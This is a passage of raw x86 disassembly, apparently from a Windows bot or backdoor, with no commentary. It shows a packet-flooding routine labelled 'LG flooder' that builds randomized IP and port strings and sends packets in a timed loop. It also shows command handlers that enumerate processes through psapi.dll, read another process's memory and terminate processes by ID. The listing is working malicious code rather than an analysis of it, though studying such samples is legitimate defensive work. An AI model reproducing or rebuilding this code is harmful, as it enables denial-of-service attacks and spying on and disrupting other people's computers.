call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp-14h]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_405A81
; ---------------------------------------------------------------------------
loc_405B0C: ; CODE XREF: .text:00405A8F�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push offset aU_U_U_UU_0 ; "%u.%u.%u.%u:%u"
push dword ptr [ebp-14h]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp-14h]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_405C6F
; ---------------------------------------------------------------------------
loc_405B87: ; CODE XREF: .text:00405A59�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset aU ; "%u\r\n"
push dword ptr [ebp-14h]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_405BA9: ; CODE XREF: .text:00405C13�j
push dword ptr [ebp-14h]
call sub_416B40 ; strlen
pop ecx
cmp eax, 7D0h
jnb short loc_405C15
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push offset aU_U_U_UU ; "%u.%u.%u.%u:%u\r\n"
push dword ptr [ebp-14h]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp-14h]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp short loc_405BA9
; ---------------------------------------------------------------------------
loc_405C15: ; CODE XREF: .text:00405BB7�j
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push offset aU_U_U_UU_0 ; "%u.%u.%u.%u:%u"
push dword ptr [ebp-14h]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp-14h]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
loc_405C6F: ; CODE XREF: .text:00405A4D�j
; .text:00405B82�j
jmp short loc_405C93
; ---------------------------------------------------------------------------
loc_405C71: ; CODE XREF: .text:004057F7�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset aU_0 ; "%u"
push dword ptr [ebp-14h]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_405C93: ; CODE XREF: .text:0040591F�j
; .text:00405A0C�j ...
push dword ptr [ebp-14h]
call sub_416B40 ; strlen
pop ecx
mov [ebp-1354h], eax
and dword ptr [ebp-1350h], 0
jmp short loc_405CB8
; ---------------------------------------------------------------------------
loc_405CAB: ; CODE XREF: .text:00405CDE�j
mov eax, [ebp-1350h]
inc eax
mov [ebp-1350h], eax
loc_405CB8: ; CODE XREF: .text:00405CA9�j
mov eax, [ebp-1350h]
cmp eax, [ebp-1354h]
jnb short loc_405CE0
mov eax, [ebp-14h]
add eax, [ebp-1350h]
mov al, [eax]
shl al, 1
mov ecx, [ebp-14h]
add ecx, [ebp-1350h]
mov [ecx], al
jmp short loc_405CAB
; ---------------------------------------------------------------------------
loc_405CE0: ; CODE XREF: .text:00405CC4�j
mov eax, [ebp-1354h]
add eax, 1Ch
push eax
call ds:dword_417238 ; htons
mov ecx, [ebp-133Ch]
mov [ecx+2], ax
call sub_41043F
push eax
call ds:dword_417238 ; htons
mov ecx, [ebp-133Ch]
mov [ecx+4], ax
call sub_410483
neg eax
sbb eax, eax
and al, 0C0h
add eax, 80h
mov ecx, [ebp-133Ch]
mov [ecx+8], al
push 2
push offset dword_41EF48
call ds:dword_417244 ; inet_addr
push eax
call sub_4040E8
pop ecx
pop ecx
mov ecx, [ebp-133Ch]
mov [ecx+0Ch], eax
mov eax, [ebp-1354h]
add eax, 14h
push eax
push dword ptr [ebp-133Ch]
call sub_40407D
pop ecx
pop ecx
mov ecx, [ebp-133Ch]
mov [ecx+0Ah], ax
movzx eax, word ptr [ebp-0Eh]
test eax, eax
jnz short loc_405D7F
call sub_41043F
mov ecx, [ebp-133Ch]
mov [ecx+16h], ax
loc_405D7F: ; CODE XREF: .text:00405D6E�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
push eax
call ds:dword_417238 ; htons
mov ecx, [ebp-133Ch]
mov [ecx+14h], ax
mov eax, [ebp-1354h]
add eax, 8
push eax
call ds:dword_417238 ; htons
mov ecx, [ebp-133Ch]
mov [ecx+18h], ax
push 10h
lea eax, [ebp-10h]
push eax
push 0
mov eax, [ebp-1354h]
add eax, 1Ch
push eax
lea eax, [ebp-1074h]
push eax
push dword ptr [ebp-1078h]
call ds:dword_417250 ; sendto
mov [ebp-1348h], eax
cmp dword ptr [ebp-1348h], 0FFFFFFFFh
jnz short loc_405E08
push dword ptr [ebp-1334h]
call sub_409763
pop ecx
push dword ptr [ebp-1078h]
call sub_4053B1
pop ecx
xor eax, eax
jmp short locret_405E41
; ---------------------------------------------------------------------------
loc_405E08: ; CODE XREF: .text:00405DEA�j
push dword ptr [ebp-1083h]
call ds:dword_41709C ; Sleep
mov eax, [ebp-1334h]
cmp dword ptr [eax+4], 0
jz short loc_405E22
jmp short loc_405E27
; ---------------------------------------------------------------------------
loc_405E22: ; CODE XREF: .text:00405E1E�j
jmp loc_4057A9
; ---------------------------------------------------------------------------
loc_405E27: ; CODE XREF: .text:004057C2�j
; .text:00405E20�j
push dword ptr [ebp-1078h]
call sub_4053B1
pop ecx
push dword ptr [ebp-1334h]
call sub_409763
pop ecx
xor eax, eax
locret_405E41: ; CODE XREF: .text:0040563E�j
; .text:00405679�j ...
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405E45 proc near ; CODE XREF: sub_40A9CF+8B2�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_4], 0
jz short loc_405E5D
cmp [ebp+arg_8], 0
jz short loc_405E5D
cmp [ebp+arg_14], 0
jnz short loc_405E62
loc_405E5D: ; CODE XREF: sub_405E45+A�j
; sub_405E45+10�j
jmp locret_405F65
; ---------------------------------------------------------------------------
loc_405E62: ; CODE XREF: sub_405E45+16�j
push 2B9h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_405E7B
jmp locret_405F65
; ---------------------------------------------------------------------------
loc_405E7B: ; CODE XREF: sub_405E45+2F�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push 100h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 1A7h
push eax
call sub_407A56
add esp, 0Ch
push 6
push [ebp+arg_8]
mov eax, [ebp+var_4]
add eax, 2A7h
push eax
call sub_407A56
add esp, 0Ch
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+2ADh], eax
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+2B1h], eax
push [ebp+arg_14]
call sub_416B9C ; atoi
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+2B5h], eax
mov eax, [ebp+var_4]
cmp dword ptr [eax+2B1h], 0EA60h
jge short loc_405F0E
mov eax, [ebp+var_4]
mov eax, [eax+2B1h]
mov [ebp+var_8], eax
jmp short loc_405F15
; ---------------------------------------------------------------------------
loc_405F0E: ; CODE XREF: sub_405E45+B9�j
mov [ebp+var_8], 0EA60h
loc_405F15: ; CODE XREF: sub_405E45+C7�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_8]
mov [eax+2B1h], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax+2B1h], 64h
jle short loc_405F3B
mov eax, [ebp+var_4]
mov eax, [eax+2B1h]
mov [ebp+var_C], eax
jmp short loc_405F42
; ---------------------------------------------------------------------------
loc_405F3B: ; CODE XREF: sub_405E45+E6�j
mov [ebp+var_C], 64h
loc_405F42: ; CODE XREF: sub_405E45+F4�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_C]
mov [eax+2B1h], ecx
push offset aLgFlooder ; "LG flooder"
push 0
push [ebp+var_4]
push offset loc_4055E5
call sub_4095A4
add esp, 10h
locret_405F65: ; CODE XREF: sub_405E45:loc_405E5D�j
; sub_405E45+31�j
leave
retn
sub_405E45 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405F67 proc near ; CODE XREF: sub_4017AA+6E�p
; sub_401D6E+77�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
jnz short loc_405F8E
push 1A3h
push 0
push [ebp+arg_0]
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_0]
mov byte ptr [eax+198h], 1
jmp short loc_405FA1
; ---------------------------------------------------------------------------
loc_405F8E: ; CODE XREF: sub_405F67+7�j
push 1A3h
push [ebp+arg_4]
push [ebp+arg_0]
call sub_416B52 ; memcpy
add esp, 0Ch
loc_405FA1: ; CODE XREF: sub_405F67+25�j
pop ebp
retn
sub_405F67 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405FA3 proc near ; CODE XREF: .text:004168C1�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push offset dword_41E2B0
call sub_409C36
pop ecx
push offset aPsapi_dll ; "psapi.dll"
call ds:dword_417054 ; LoadLibraryA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_405FC8
jmp short locret_40603F
; ---------------------------------------------------------------------------
loc_405FC8: ; CODE XREF: sub_405FA3+21�j
push offset aEnumprocesses ; "EnumProcesses"
push [ebp+var_4]
call ds:dword_417058 ; GetProcAddress
mov dword_41E2AC, eax
push offset aEnumprocessmod ; "EnumProcessModules"
push [ebp+var_4]
call ds:dword_417058 ; GetProcAddress
mov dword_41E2A0, eax
push offset aGetmodulefilen ; "GetModuleFileNameExA"
push [ebp+var_4]
call ds:dword_417058 ; GetProcAddress
mov dword_41E2A4, eax
push offset aGetmoduleinfor ; "GetModuleInformation"
push [ebp+var_4]
call ds:dword_417058 ; GetProcAddress
mov dword_41E2A8, eax
cmp dword_41E2AC, 0
jz short locret_40603F
cmp dword_41E2A0, 0
jz short locret_40603F
cmp dword_41E2A4, 0
jz short locret_40603F
cmp dword_41E2A8, 0
jz short locret_40603F
mov byte_41E2CC, 1
locret_40603F: ; CODE XREF: sub_405FA3+23�j
; sub_405FA3+78�j ...
leave
retn
sub_405FA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406041 proc near ; CODE XREF: .text:loc_40129D�p
; .text:004063A5�p
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_130 = dword ptr -130h
var_12C = byte ptr -12Ch
var_12B = byte ptr -12Bh
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 13Ch
push esi
push edi
push offset dword_41E2B0
call sub_409C6C
pop ecx
movzx eax, byte_41E2CC
test eax, eax
jnz short loc_406074
push offset dword_41E2B0
call sub_409C7A
pop ecx
xor eax, eax
jmp loc_40636A
; ---------------------------------------------------------------------------
loc_406074: ; CODE XREF: sub_406041+1F�j
and [ebp+var_C], 0
and [ebp+var_4], 0
and [ebp+var_1C], 0
push [ebp+var_1C]
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_406097
jmp loc_406368
; ---------------------------------------------------------------------------
loc_406097: ; CODE XREF: sub_406041+4F�j
; sub_406041:loc_4060E9�j
mov eax, [ebp+var_1C]
add eax, 80h
mov [ebp+var_1C], eax
push [ebp+var_1C]
push [ebp+var_14]
call sub_416BF6 ; realloc
pop ecx
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_4060BD
jmp loc_406366
; ---------------------------------------------------------------------------
loc_4060BD: ; CODE XREF: sub_406041+75�j
lea eax, [ebp+var_4]
push eax
push [ebp+var_1C]
push [ebp+var_14]
call dword_41E2AC
test eax, eax
jnz short loc_4060DF
push [ebp+var_14]
call sub_416B4C ; free
pop ecx
jmp loc_406364
; ---------------------------------------------------------------------------
loc_4060DF: ; CODE XREF: sub_406041+8E�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_1C]
jnb short loc_4060E9
jmp short loc_4060EB
; ---------------------------------------------------------------------------
loc_4060E9: ; CODE XREF: sub_406041+A4�j
jmp short loc_406097
; ---------------------------------------------------------------------------
loc_4060EB: ; CODE XREF: sub_406041+A6�j
mov eax, [ebp+var_4]
shr eax, 2
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
imul eax, 114h
add eax, 8
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_40611E
push [ebp+var_14]
call sub_416B4C ; free
pop ecx
jmp loc_406362
; ---------------------------------------------------------------------------
loc_40611E: ; CODE XREF: sub_406041+CD�j
mov eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [eax], ecx
mov eax, [ebp+var_C]
add eax, 8
mov ecx, [ebp+var_C]
mov [ecx+4], eax
and [ebp+var_10], 0
jmp short loc_40613F
; ---------------------------------------------------------------------------
loc_406138: ; CODE XREF: sub_406041+156�j
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
loc_40613F: ; CODE XREF: sub_406041+F5�j
mov eax, [ebp+var_10]
cmp eax, [ebp+var_8]
jnb short loc_406199
push 114h
push 0
mov eax, [ebp+var_C]
push dword ptr [eax+4]
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
mov edx, [ebp+var_10]
mov esi, [ebp+var_14]
mov edx, [esi+edx*4]
mov [ecx+eax], edx
push offset aSystem ; "system"
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_406138
; ---------------------------------------------------------------------------
loc_406199: ; CODE XREF: sub_406041+104�j
push [ebp+var_14]
call sub_416B4C ; free
pop ecx
and [ebp+var_10], 0
jmp short loc_4061AF
; ---------------------------------------------------------------------------
loc_4061A8: ; CODE XREF: sub_406041+1A8�j
; sub_406041+1D8�j ...
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
loc_4061AF: ; CODE XREF: sub_406041+165�j
mov eax, [ebp+var_10]
cmp eax, [ebp+var_8]
jnb loc_406343
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
push dword ptr [ecx+eax]
push 0
push 410h
call ds:dword_417094 ; OpenProcess
mov [ebp+var_130], eax
cmp [ebp+var_130], 0
jnz short loc_4061EB
jmp short loc_4061A8
; ---------------------------------------------------------------------------
loc_4061EB: ; CODE XREF: sub_406041+1A6�j
and [ebp+var_20], 0
and [ebp+var_28], 0
lea eax, [ebp+var_20]
push eax
push 4
lea eax, [ebp+var_28]
push eax
push [ebp+var_130]
call dword_41E2A0
test eax, eax
jnz short loc_40621B
push [ebp+var_130]
call ds:dword_4170A4 ; CloseHandle
jmp short loc_4061A8
; ---------------------------------------------------------------------------
loc_40621B: ; CODE XREF: sub_406041+1CA�j
push 0Ch
lea eax, [ebp+var_13C]
push eax
push [ebp+var_28]
push [ebp+var_130]
call dword_41E2A8
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
mov edx, [ebp+var_13C]
mov [ecx+eax+4], edx
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
mov edx, [ebp+var_138]
mov [ecx+eax+8], edx
mov al, byte_41DE30
mov [ebp+var_12C], al
push 40h
pop ecx
xor eax, eax
lea edi, [ebp+var_12B]
rep stosd
stosw
stosb
push 104h
lea eax, [ebp+var_12C]
push eax
push [ebp+var_13C]
push [ebp+var_130]
call dword_41E2A4
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz loc_406332
movsx eax, [ebp+var_12C]
test eax, eax
jz short loc_406332
push 104h
lea eax, [ebp+var_12C]
push eax
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
lea eax, [ebp+var_12C]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_18], eax
jmp short loc_4062F7
; ---------------------------------------------------------------------------
loc_4062F0: ; CODE XREF: sub_406041:loc_406330�j
mov eax, [ebp+var_18]
dec eax
mov [ebp+var_18], eax
loc_4062F7: ; CODE XREF: sub_406041+2AD�j
cmp [ebp+var_18], 0
jz short loc_406332
cmp [ebp+var_18], 1
ja short loc_406305
jmp short loc_406332
; ---------------------------------------------------------------------------
loc_406305: ; CODE XREF: sub_406041+2C0�j
mov eax, [ebp+var_18]
movsx eax, byte ptr [ebp+eax+var_130+3]
cmp eax, 5Ch
jnz short loc_406330
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
mov edx, [ebp+var_18]
mov [ecx+eax+110h], edx
jmp short loc_406332
; ---------------------------------------------------------------------------
loc_406330: ; CODE XREF: sub_406041+2D2�j
jmp short loc_4062F0
; ---------------------------------------------------------------------------
loc_406332: ; CODE XREF: sub_406041+264�j
; sub_406041+273�j ...
push [ebp+var_130]
call ds:dword_4170A4 ; CloseHandle
jmp loc_4061A8
; ---------------------------------------------------------------------------
loc_406343: ; CODE XREF: sub_406041+174�j
push offset dword_41E2B0
call sub_409C7A
pop ecx
mov eax, [ebp+var_C]
jmp short loc_40636A
; ---------------------------------------------------------------------------
loc_406353: ; CODE XREF: sub_406041:loc_406362�j
; sub_406041:loc_406364�j ...
push offset dword_41E2B0
call sub_409C7A
pop ecx
xor eax, eax
jmp short loc_40636A
; ---------------------------------------------------------------------------
loc_406362: ; CODE XREF: sub_406041+D8�j
jmp short loc_406353
; ---------------------------------------------------------------------------
loc_406364: ; CODE XREF: sub_406041+99�j
jmp short loc_406353
; ---------------------------------------------------------------------------
loc_406366: ; CODE XREF: sub_406041+77�j
jmp short loc_406353
; ---------------------------------------------------------------------------
loc_406368: ; CODE XREF: sub_406041+51�j
jmp short loc_406353
; ---------------------------------------------------------------------------
loc_40636A: ; CODE XREF: sub_406041+2E�j
; sub_406041+310�j ...
pop edi
pop esi
leave
retn
sub_406041 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40636E proc near ; CODE XREF: .text:00401716�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
pop ebp
retn
sub_40636E endp
; ---------------------------------------------------------------------------
loc_40637C: ; DATA XREF: sub_4064BF+3B�o
push ebp
mov ebp, esp
sub esp, 1B0h
push 1A7h
push dword ptr [ebp+8]
lea eax, [ebp-1A8h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
call sub_406041
mov [ebp-1ACh], eax
cmp dword ptr [ebp-1ACh], 0
jz loc_4064AD
mov eax, [ebp-1ACh]
push dword ptr [eax]
mov eax, [ebp-1A8h]
push dword ptr [eax]
push offset dword_418B1C
lea eax, [ebp-1A4h]
push eax
call sub_40D53F
add esp, 10h
and dword ptr [ebp-1B0h], 0
jmp short loc_4063F7
; ---------------------------------------------------------------------------
loc_4063EA: ; CODE XREF: .text:loc_40649C�j
mov eax, [ebp-1B0h]
inc eax
mov [ebp-1B0h], eax
loc_4063F7: ; CODE XREF: .text:004063E8�j
mov eax, [ebp-1ACh]
mov ecx, [ebp-1B0h]
cmp ecx, [eax]
jge loc_4064A1
push 3E8h
call ds:dword_41709C ; Sleep
mov eax, [ebp-1B0h]
imul eax, 114h
mov ecx, [ebp-1ACh]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
mov eax, [ebp-1B0h]
imul eax, 114h
mov ecx, [ebp-1ACh]
mov ecx, [ecx+4]
push dword ptr [ecx+eax+8]
mov eax, [ebp-1B0h]
imul eax, 114h
mov ecx, [ebp-1ACh]
mov ecx, [ecx+4]
push dword ptr [ecx+eax+4]
mov eax, [ebp-1B0h]
imul eax, 114h
mov ecx, [ebp-1ACh]
mov ecx, [ecx+4]
push dword ptr [ecx+eax]
push offset dword_418B04
lea eax, [ebp-1A4h]
push eax
call sub_40D53F
add esp, 18h
mov eax, [ebp-1A8h]
cmp dword ptr [eax+4], 0
jz short loc_40649C
jmp short loc_4064A1
; ---------------------------------------------------------------------------
loc_40649C: ; CODE XREF: .text:00406498�j
jmp loc_4063EA
; ---------------------------------------------------------------------------
loc_4064A1: ; CODE XREF: .text:00406405�j
; .text:0040649A�j
push dword ptr [ebp-1ACh]
call sub_416B4C ; free
pop ecx
loc_4064AD: ; CODE XREF: .text:004063B7�j
push dword ptr [ebp-1A8h]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4064BF proc near ; CODE XREF: sub_40A9CF+3FF�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4064D9
jmp short locret_406507
; ---------------------------------------------------------------------------
loc_4064D9: ; CODE XREF: sub_4064BF+16�j
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push offset aListProcesses ; "List processes"
push 0
push [ebp+var_4]
push offset loc_40637C
call sub_4095A4
add esp, 10h
locret_406507: ; CODE XREF: sub_4064BF+18�j
leave
retn
sub_4064BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406509 proc near ; CODE XREF: sub_40A9CF+9C9�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
cmp [ebp+arg_4], 0
jz short loc_40651B
cmp [ebp+arg_C], 0
jnz short loc_406520
loc_40651B: ; CODE XREF: sub_406509+A�j
jmp locret_406641
; ---------------------------------------------------------------------------
loc_406520: ; CODE XREF: sub_406509+10�j
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
push [ebp+arg_8]
call sub_40A8AD
pop ecx
mov [ebp+var_C], eax
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 180h
jbe short loc_406554
mov [ebp+var_4], 180h
loc_406554: ; CODE XREF: sub_406509+42�j
mov eax, [ebp+var_4]
inc eax
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_1C], eax
push [ebp+var_8]
push 0
push 10h
call ds:dword_417094 ; OpenProcess
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jnz short loc_406586
push [ebp+var_1C]
call sub_416B4C ; free
pop ecx
jmp locret_406641
; ---------------------------------------------------------------------------
loc_406586: ; CODE XREF: sub_406509+6D�j
and [ebp+var_14], 0
lea eax, [ebp+var_14]
push eax
push [ebp+var_4]
push [ebp+var_1C]
push [ebp+var_C]
push [ebp+var_18]
call ds:dword_417098 ; ReadProcessMemory
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz loc_40662F
cmp [ebp+var_14], 0
jz short loc_40662F
mov eax, [ebp+var_1C]
add eax, [ebp+var_4]
and byte ptr [eax], 0
and [ebp+var_20], 0
jmp short loc_4065C9
; ---------------------------------------------------------------------------
loc_4065C2: ; CODE XREF: sub_406509:loc_406620�j
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
loc_4065C9: ; CODE XREF: sub_406509+B7�j
mov eax, [ebp+var_20]
cmp eax, [ebp+var_14]
jnb short loc_406622
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_406617
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_406617
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 1Fh
jz short loc_406617
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 16h
jz short loc_406617
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 10h
jg short loc_406620
loc_406617: ; CODE XREF: sub_406509+D4�j
; sub_406509+E2�j ...
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
mov byte ptr [eax], 2Eh
loc_406620: ; CODE XREF: sub_406509+10C�j
jmp short loc_4065C2
; ---------------------------------------------------------------------------
loc_406622: ; CODE XREF: sub_406509+C6�j
push [ebp+var_1C]
push [ebp+arg_0]
call sub_40D53F
pop ecx
pop ecx
loc_40662F: ; CODE XREF: sub_406509+9E�j
; sub_406509+A8�j
push [ebp+var_1C]
call sub_416B4C ; free
pop ecx
push [ebp+var_18]
call ds:dword_4170A4 ; CloseHandle
locret_406641: ; CODE XREF: sub_406509:loc_40651B�j
; sub_406509+78�j
leave
retn
sub_406509 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406643 proc near ; CODE XREF: sub_40A9CF+3D7�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_4], 0
jnz short loc_406650
jmp short locret_40668D
; ---------------------------------------------------------------------------
loc_406650: ; CODE XREF: sub_406643+9�j
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_4], eax
call ds:dword_4170E8 ; GetCurrentProcessId
cmp [ebp+var_4], eax
jnz short loc_406669
jmp short locret_40668D
; ---------------------------------------------------------------------------
loc_406669: ; CODE XREF: sub_406643+22�j
push [ebp+var_4]
push 0
push 1
call ds:dword_417094 ; OpenProcess
mov [ebp+var_8], eax
push 0
push [ebp+var_8]
call ds:dword_4170A0 ; TerminateProcess
push [ebp+var_8]
call ds:dword_4170A4 ; CloseHandle
locret_40668D: ; CODE XREF: sub_406643+B�j
; sub_406643+24�j
leave
retn
sub_406643 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40668F proc near ; CODE XREF: .text:00403F3C�p
; sub_40A9CF+BD�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_4066A0
; ---------------------------------------------------------------------------
loc_406699: ; CODE XREF: sub_40668F+2A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4066A0: ; CODE XREF: sub_40668F+8�j
cmp [ebp+var_4], 8
jge short loc_4066BB
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_406699
; ---------------------------------------------------------------------------
loc_4066BB: ; CODE XREF: sub_40668F+15�j
mov eax, [ebp+arg_0]
and byte ptr [eax+8], 0
and [ebp+var_4], 0
jmp short loc_4066CF
; ---------------------------------------------------------------------------
loc_4066C8: ; CODE XREF: sub_40668F+59�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4066CF: ; CODE XREF: sub_40668F+37�j
cmp [ebp+var_4], 6
jge short loc_4066EA
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_4066C8
; ---------------------------------------------------------------------------
loc_4066EA: ; CODE XREF: sub_40668F+44�j
mov eax, [ebp+arg_4]
and byte ptr [eax+6], 0
and [ebp+var_4], 0
jmp short loc_4066FE
; ---------------------------------------------------------------------------
loc_4066F7: ; CODE XREF: sub_40668F+88�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
